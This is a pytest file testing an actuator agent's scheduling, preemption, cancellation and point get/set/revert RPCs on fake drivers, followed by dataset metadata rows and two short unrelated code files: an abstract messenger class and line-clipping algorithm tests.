        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        'task_low_priority4',
        'LOW',
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    # wait for above call's success response to publish_agent.callback
    gevent.sleep(1)
    publish_agent.callback.reset_mock()

    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        'HIGH',
        msg).get(timeout=10)
    assert result['result'] == SUCCESS
    # wait for 2 callbacks - success msg for task_high_priority4 and
    # preempt msg for task_low_priority4
    gevent.sleep(6)
    print('call args list:', publish_agent.callback.call_args_list)
    assert publish_agent.callback.call_count == 2

    # Grab the args of the callbacks and verify
    call_args1 = publish_agent.callback.call_args_list[0][0]
    call_args2 = publish_agent.callback.call_args_list[1][0]
    assert call_args1[1] == PLATFORM_ACTUATOR
    assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
    # initialize 0 to schedule response and 1 to cancel response
    schedule_header = call_args1[4]
    schedule_message = call_args1[5]
    print("call args of 1 ", publish_agent.callback.call_args_list[1])
    cancel_header = call_args2[4]
    cancel_message = call_args2[5]
    # check if order is reversed: 0 is cancel response and 1 is new schedule
    if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
        assert call_args2[4]['type'] == 'NEW_SCHEDULE'
        cancel_header = call_args1[4]
        cancel_message = call_args1[5]
        schedule_header = call_args2[4]
        schedule_message = call_args2[5]
    else:
        assert call_args1[4]['type'] == 'NEW_SCHEDULE'
        assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'

    # values remain as initialized above if/else
    assert schedule_header['type'] == 'NEW_SCHEDULE'
    assert schedule_header['taskID'] == taskid
    assert schedule_header['requesterID'] == agentid
    assert schedule_message['result'] == SUCCESS

    assert cancel_header['taskID'] == 'task_low_priority4'
    assert cancel_message['data']['agentID'] == agentid
    assert cancel_message['data']['taskID'] == taskid
    assert cancel_message['result'] == 'PREEMPTED'
@pytest.mark.actuator
def test_schedule_conflict_self(publish_agent):
    """
    Test error response for schedule request. Test schedule with
    conflicting time slots in the same request.

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_conflict_self ****")
    taskid = 'task_self_conflict'
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    # the same device/time slot listed twice conflicts with itself
    msg = [
        ['fakedriver1', start, end],
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': 'REQUEST_CONFLICTS_WITH_SELF', ...,
    # 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'REQUEST_CONFLICTS_WITH_SELF'
@pytest.mark.actuator
def test_schedule_conflict(publish_agent, cancel_schedules):
    """
    Test schedule conflict with existing schedule

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_conflict ****")
    # set agentid and task id for cancel_schedules fixture
    agentid = TEST_AGENT
    taskid = 'task_conflict1'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    print(result)
    assert result['result'] == SUCCESS

    # second request for the same device/time slot must conflict
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        'task_conflict2',
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': 'CONFLICTS_WITH_EXISTING_SCHEDULES', ...,
    # 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'CONFLICTS_WITH_EXISTING_SCHEDULES'
@pytest.mark.actuator
def test_schedule_overlap_success(publish_agent, cancel_schedules):
    """
    Test schedule where stop time of one requested time slot is the same as
    start time of another requested time slot.
    Expected Result : SUCCESS
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_overlap_success ****")
    # set agentid and task id for cancel_schedules fixture
    agentid = TEST_AGENT
    taskid = 'task_overlap'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    end2 = str(datetime.now() + timedelta(seconds=2))
    # Second slot starts exactly when the first one ends; this is
    # adjacency, not overlap, and must be accepted.
    msg = [
        ['fakedriver0', start, end],
        ['fakedriver0', end, end2]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
@pytest.mark.actuator
def test_cancel_error_invalid_taskid(publish_agent):
    """
    Test error response for a cancel request with a task id that was
    never scheduled. Expected result: FAILURE with info
    'TASK_ID_DOES_NOT_EXIST'.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_cancel_error_invalid_taskid ****")
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_CANCEL_SCHEDULE,
        TEST_AGENT,
        'invalid_cancel',
    ).get(timeout=10)
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'TASK_ID_DOES_NOT_EXIST'
@pytest.mark.actuator
def test_cancel_error_taskid_agentid_mismatch(publish_agent, cancel_schedules):
    """
    Test error response when cancelling a valid task id with an agent id
    other than the one that scheduled it. Expected result: FAILURE with
    info 'AGENT_ID_TASK_ID_MISMATCH'.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_cancel_error_taskid_agentid_mismatch ****")
    agentid = TEST_AGENT
    taskid = 'invalid_cancel'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    # Cancel with a different agent id than the one that scheduled.
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_CANCEL_SCHEDULE,
        'invalid_agent_for_task',
        taskid,
    ).get(timeout=10)
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'AGENT_ID_TASK_ID_MISMATCH'
@pytest.mark.actuator
def test_cancel_success(publish_agent):
    """
    Test successful schedule cancel: schedule a slot, then cancel it with
    the same agent id and task id. Both calls should report SUCCESS.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_cancel_success ****")
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        'cancel_success',
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_CANCEL_SCHEDULE,
        TEST_AGENT,
        'cancel_success',
    ).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
@pytest.mark.actuator
def test_get_default(publish_agent):
    """
    Test get default value of a point without any prior schedule or set.
    Expected result: the driver's configured default (10.0).
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_get_default ****")
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'get_point',  # Method
        'fakedriver1/SampleWritableFloat1'  # point
    ).get(timeout=10)
    print(result)
    assert result == 10.0
@pytest.mark.actuator
def test_get_success(publish_agent, cancel_schedules):
    """
    Test getting a float value of a point through RPC after setting it.
    Expected Result - the value written by set_point
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at
    the end of test so that other tests can use the same device and time slot
    """
    print("\n**** test_get_success ****")
    agentid = TEST_AGENT
    taskid = 'task_set_and_get'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'set_point',  # Method
        agentid,  # Requestor
        'fakedriver1/SampleWritableFloat1',  # Point to set
        1.0  # New value
    ).get(timeout=10)
    assert result == 1.0
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'get_point',  # Method
        'fakedriver1/SampleWritableFloat1'  # point
    ).get(timeout=10)
    # get_point should read back the value just written.
    print(result)
    assert result == 1.0
@pytest.mark.actuator
def test_get_error_invalid_point(publish_agent):
    """
    Test getting a value of a point that is not configured on the device.
    Expected result: RemoteError mentioning the unconfigured point name.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_get_error_invalid_point ****")
    try:
        result = publish_agent.vip.rpc.call(
            PLATFORM_ACTUATOR,  # Target agent
            'get_point',  # Method
            'fakedriver1/SampleWritableFloat123').get(timeout=10)
        pytest.fail('Expecting RemoteError for accessing invalid point. '
                    'Code returned {}'.format(result))
    except RemoteError as e:
        assert e.message.find(
            'Point not configured on device: SampleWritableFloat123') != -1
@pytest.mark.actuator
def test_set_value_float(publish_agent, cancel_schedules, revert_devices):
    """
    Test setting a float value of a point through rpc
    Expected result = value of the actuation point
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_set_value_float ****")
    taskid = 'task_set_float_value'
    agentid = TEST_AGENT
    device = 'fakedriver0'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    revert_devices.append({'agentid': agentid, 'device': device})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        [device, start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'set_point',  # Method
        agentid,  # Requestor
        'fakedriver0/SampleWritableFloat1',  # Point to set
        2.5  # New value
    ).get(timeout=10)
    # set_point echoes the written value on success.
    assert result == 2.5
@pytest.mark.actuator
def test_revert_point(publish_agent, cancel_schedules):
    """
    Test reverting a single point after setting it through rpc.
    Expected result: get_point returns the pre-set value after revert_point.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_revert_point ****")
    taskid = 'test_revert_point'
    agentid = TEST_AGENT
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    initial_value = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'get_point',  # Method
        'fakedriver0/SampleWritableFloat1',  # Point to get
    ).get(timeout=10)
    # Write a value guaranteed to differ from the initial one.
    test_value = initial_value + 1.0
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'set_point',  # Method
        agentid,  # Requestor
        'fakedriver0/SampleWritableFloat1',  # Point to set
        test_value  # New value
    ).get(timeout=10)
    assert result == test_value
    publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'revert_point',  # Method
        agentid,  # Requestor
        'fakedriver0/SampleWritableFloat1'  # Point to revert
    ).get(timeout=10)
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'get_point',  # Method
        'fakedriver0/SampleWritableFloat1',  # Point to get
    ).get(timeout=10)
    # Revert should restore the value read before set_point.
    assert result == initial_value
@pytest.mark.actuator
def test_revert_device(publish_agent, cancel_schedules):
    """
    Test reverting an entire device after setting one of its points.
    Expected result: get_point returns the pre-set value after revert_device.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_revert_device ****")
    # Unique task id (was copy-pasted 'test_revert_point', which could
    # collide with the sibling test's schedule).
    taskid = 'test_revert_device'
    agentid = TEST_AGENT
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    initial_value = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'get_point',  # Method
        'fakedriver0/SampleWritableFloat1',  # Point to get
    ).get(timeout=10)
    # Write a value guaranteed to differ from the initial one.
    test_value = initial_value + 1.0
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'set_point',  # Method
        agentid,  # Requestor
        'fakedriver0/SampleWritableFloat1',  # Point to set
        test_value  # New value
    ).get(timeout=10)
    assert result == test_value
    publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'revert_device',  # Method
        agentid,  # Requestor
        'fakedriver0'  # Device to revert
    ).get(timeout=10)
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,  # Target agent
        'get_point',  # Method
        'fakedriver0/SampleWritableFloat1',  # Point to get
    ).get(timeout=10)
    # Revert should restore the value read before set_point.
    assert result == initial_value
@pytest.mark.actuator
def test_set_error_array(publish_agent, cancel_schedules):
    """
    Test setting an array containing a single float on a float point.
    Expected result: RemoteError wrapping the driver's TypeError.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_set_error_array ****")
    # set agentid and task id for cancel_schedules fixture
    agentid = TEST_AGENT
    taskid = 'task_set_float_array_value'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    try:
        result = publish_agent.vip.rpc.call(
            PLATFORM_ACTUATOR,  # Target agent
            'set_point',  # Method
            agentid,  # Requestor
            'fakedriver0/SampleWritableFloat1',  # Point to set
            [2.5]  # New value
        ).get(timeout=10)
        pytest.fail('Expecting RemoteError for trying to set array on point '
                    'that expects float. Code returned {}'.format(result))
    except RemoteError as e:
        assert e.message == \
            "TypeError('float() argument must be a string or a number')"
@pytest.mark.actuator
def test_set_lock_error(publish_agent):
    """
    Test setting a float value of a point through rpc without an allocation.
    Expected result: RemoteError with exc_type 'actuator.agent.LockError'
    and message 'caller (<agent>) does not have this lock'.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_set_lock_error ****")
    try:
        result = publish_agent.vip.rpc.call(
            PLATFORM_ACTUATOR,  # Target agent
            'set_point',  # Method
            TEST_AGENT,  # Requestor
            'fakedriver1/SampleWritableFloat1',  # Point to set
            '2.5'  # New value
        ).get(timeout=10)
        pytest.fail('Expecting LockError. Code returned: {}'.format(result))
    except RemoteError as e:
        assert e.exc_info['exc_type'] == 'actuator.agent.LockError'
        assert e.message == 'caller ({}) does not have this lock'.format(
            TEST_AGENT)
@pytest.mark.actuator
def test_set_value_error(publish_agent, cancel_schedules):
    """
    Test setting a wrong-type value (string) on a float point through rpc.
    Expected result: RemoteError wrapping the driver's ValueError.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_set_value_error ****")
    agentid = TEST_AGENT
    taskid = 'task_set_value_error'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    try:
        # NOTE(review): literal 'platform.actuator' used here where sibling
        # tests use PLATFORM_ACTUATOR — presumably the same identity.
        result = publish_agent.vip.rpc.call(
            'platform.actuator',  # Target agent
            'set_point',  # Method
            agentid,  # Requestor
            'fakedriver0/SampleWritableFloat1',  # Point to set
            'On').get(timeout=10)
        pytest.fail(
            "Expecting ValueError but code returned: {}".format(result))
    except RemoteError as e:
        assert e.message == "ValueError('could not convert string to float: " \
                            "On')"
@pytest.mark.actuator
def test_set_error_none_agent(publish_agent, cancel_schedules):
    """
    Test setting a value of a point through rpc with agentid=None.
    Expected result: RemoteError with exc_type 'TypeError' and message
    'Agent id must be a nonempty string'.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_set_error_none_agent ****")
    agentid = TEST_AGENT
    taskid = 'task_set_none_agent'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    try:
        result = publish_agent.vip.rpc.call(
            'platform.actuator',  # Target agent
            'set_point',  # Method
            None,  # Requestor
            'fakedriver0/SampleWritableFloat1',  # Point to set
            'On'  # New value
        ).get(timeout=10)
        pytest.fail(
            "Expecting value error but code returned: {}".format(result))
    except RemoteError as e:
        assert e.message == 'Agent id must be a nonempty string'
        assert e.exc_info['exc_type'] == 'TypeError'
@pytest.mark.actuator
def test_set_error_read_only_point(publish_agent, cancel_schedules):
    """
    Test setting a value of a read-only point through rpc.
    Expected result: RemoteError wrapping the driver's IOError.
    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_set_error_read_only_point ****")
    agentid = TEST_AGENT
    taskid = 'task_set_readonly_point'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=2))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    try:
        result = publish_agent.vip.rpc.call(
            'platform.actuator',  # Target agent
            'set_point',  # Method
            agentid,  # Requestor
            'fakedriver0/OutsideAirTemperature1',  # Point to set
            1.2  # New value
        ).get(timeout=10)
        pytest.fail(
            'Expecting RemoteError but code returned: {}'.format(result))
    except RemoteError as e:
        assert e.message == "IOError('Trying to write to a point configured " \
                            "read only: OutsideAirTemperature1')"
| 35.455114
| 79
| 0.665694
| 7,718
| 62,401
| 5.232573
| 0.067634
| 0.055268
| 0.024514
| 0.027188
| 0.839148
| 0.818324
| 0.800272
| 0.778705
| 0.761842
| 0.750303
| 0
| 0.010581
| 0.238217
| 62,401
| 1,759
| 80
| 35.47527
| 0.838985
| 0.148059
| 0
| 0.767906
| 0
| 0
| 0.167238
| 0.053062
| 0
| 0
| 0
| 0
| 0.119674
| 0
| null | null | 0
| 0.007253
| null | null | 0.074343
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
032b3bde681d942c2cc2a9c0479062ee25a714a4
| 344
|
py
|
Python
|
pySPACE/environments/live/communication/messenger.py
|
pyspace/pyspace
|
763e62c0e7fa7cfcb19ccee1a0333c4f7e68ae62
|
[
"BSD-3-Clause"
] | 32
|
2015-02-20T09:03:09.000Z
|
2022-02-25T22:32:52.000Z
|
pySPACE/environments/live/communication/messenger.py
|
pyspace/pyspace
|
763e62c0e7fa7cfcb19ccee1a0333c4f7e68ae62
|
[
"BSD-3-Clause"
] | 5
|
2015-05-18T15:08:40.000Z
|
2020-03-05T19:18:01.000Z
|
pySPACE/environments/live/communication/messenger.py
|
pyspace/pyspace
|
763e62c0e7fa7cfcb19ccee1a0333c4f7e68ae62
|
[
"BSD-3-Clause"
] | 18
|
2015-09-28T07:16:38.000Z
|
2021-01-20T13:52:19.000Z
|
import abc
class Messenger(object):
    """Abstract base class for pySPACE-live communication back ends.

    Concrete messengers must implement register, end_transmission and
    send_message.
    """
    # NOTE(review): Python 2 metaclass idiom; under Python 3 the
    # __metaclass__ attribute is silently ignored, so abstract-method
    # enforcement only applies when run with Python 2 — confirm runtime.
    __metaclass__ = abc.ABCMeta
    def __init__(self):
        # No shared state; subclasses set up their own connections.
        pass
    @abc.abstractmethod
    def register(self):
        """Register this messenger with its communication endpoint."""
        return
    @abc.abstractmethod
    def end_transmission(self):
        """Finish the transmission and release the endpoint."""
        return
    @abc.abstractmethod
    def send_message(self,message):
        """Send a single message object over the channel."""
        return
| 16.380952
| 35
| 0.593023
| 33
| 344
| 5.878788
| 0.545455
| 0.262887
| 0.309278
| 0.278351
| 0.309278
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.337209
| 344
| 21
| 36
| 16.380952
| 0.850877
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.071429
| 0.071429
| 0.214286
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
3060c4ae4db9e7c5a7dcf28973a97c8f7d97c018
| 2,634
|
py
|
Python
|
tests/test_clipping.py
|
cchenzi/INE5420
|
b14b22b1400e21b4b722d427e1f1375778c5929c
|
[
"MIT"
] | 2
|
2021-06-24T04:31:37.000Z
|
2021-06-24T19:35:15.000Z
|
tests/test_clipping.py
|
cchenzi/INE5420
|
b14b22b1400e21b4b722d427e1f1375778c5929c
|
[
"MIT"
] | null | null | null |
tests/test_clipping.py
|
cchenzi/INE5420
|
b14b22b1400e21b4b722d427e1f1375778c5929c
|
[
"MIT"
] | 1
|
2021-06-24T21:26:36.000Z
|
2021-06-24T21:26:36.000Z
|
import numpy as np
import pytest
from numpy.testing import assert_array_equal, assert_allclose
from app.clipping import cohen_sutherland, liang_barsky
def test_cohen_sutherland_both_out():
    """A segment with both endpoints outside the window is rejected."""
    visible, _, _ = cohen_sutherland((-1.2, -1.2), (1.2, -1.2))
    assert visible == False
def test_cohen_sutherland_both_in():
    """A segment with both endpoints inside the window stays visible."""
    visible, _, _ = cohen_sutherland((-0.2, -0.2), (1, -1))
    assert visible == True
def test_cohen_sutherland_left_out_right_in():
    """Left endpoint outside: it is clipped to the window border."""
    visible, (ax, ay), (bx, by) = cohen_sutherland((-1.2, -1), (1, -1))
    assert visible == True
    assert (ax, ay) == (-1, -1)
    assert (bx, by) == (1, -1)
def test_cohen_sutherland_right_out_left_in():
    """Right endpoint outside: it is clipped to the window border."""
    visible, (ax, ay), (bx, by) = cohen_sutherland((0, 0), (1.2, -1.2))
    assert visible == True
    assert (ax, ay) == (0, 0)
    assert (bx, by) == (1, -1)
def test_cohen_sutherland_top_out_left_out():
    """Segment crossing top and right borders: both ends are clipped."""
    visible, (ax, ay), (bx, by) = cohen_sutherland((0, 1.2), (1.2, 0.8))
    assert visible == True
    assert (ax, ay) == (0.6, 1)
    assert (bx, by) == (1, 0.8666666666666667)
def test_liang_barsky_both_out():
    """A segment with both endpoints outside the window is rejected."""
    visible, _, _ = liang_barsky((-1.2, -1.2), (1.2, -1.2))
    assert visible == False
def test_liang_barsky_both_in():
    """A fully interior segment is returned unchanged."""
    visible, (ax, ay), (bx, by) = liang_barsky((-0.2, -0.2), (1, -1))
    assert visible == True
    assert (ax, ay) == (-0.2, -0.2)
    assert (bx, by) == (1, -1)
def test_liang_barsky_left_out_right_in():
    """Left endpoint outside: clipped endpoint compared with a float tolerance."""
    visible, (ax, ay), (bx, by) = liang_barsky((-1.2, -1), (1, -1))
    assert visible == True
    assert (ax, ay) == (-1, -1)
    # Parametric clipping introduces float error on the right endpoint.
    assert_allclose((bx, by), (1, -1), rtol=1e-5, atol=0)
def test_liang_barsky_right_out_left_in():
    """Right endpoint outside: it is clipped to the window border."""
    visible, (ax, ay), (bx, by) = liang_barsky((0, 0), (1.2, -1.2))
    assert visible == True
    assert (ax, ay) == (0, 0)
    assert (bx, by) == (1, -1)
def test_liang_barsky_top_out_left_out():
    """Segment crossing top and right borders: both ends are clipped."""
    visible, (ax, ay), (bx, by) = liang_barsky((0, 1.2), (1.2, 0.8))
    assert visible == True
    assert (ax, ay) == (0.6, 1)
    assert (bx, by) == (1, 0.8666666666666667)
| 32.925
| 75
| 0.656036
| 406
| 2,634
| 3.945813
| 0.1133
| 0.11236
| 0.022472
| 0.024969
| 0.865793
| 0.80774
| 0.80774
| 0.80774
| 0.80774
| 0.697253
| 0
| 0.089127
| 0.186409
| 2,634
| 79
| 76
| 33.341772
| 0.658423
| 0.009871
| 0
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.431034
| 1
| 0.172414
| false
| 0
| 0.068966
| 0
| 0.241379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0653eb50eef4605592c9a553cacd35e657e3fb21
| 8,755
|
py
|
Python
|
tests/test_models.py
|
edornd/multimodal-icl
|
f79bfa73665db471c12ee9cb57bbee1bcabb0467
|
[
"MIT"
] | 6
|
2021-12-08T05:58:18.000Z
|
2021-12-29T09:55:32.000Z
|
tests/test_models.py
|
edornd/multimodal-icl
|
f79bfa73665db471c12ee9cb57bbee1bcabb0467
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
edornd/multimodal-icl
|
f79bfa73665db471c12ee9cb57bbee1bcabb0467
|
[
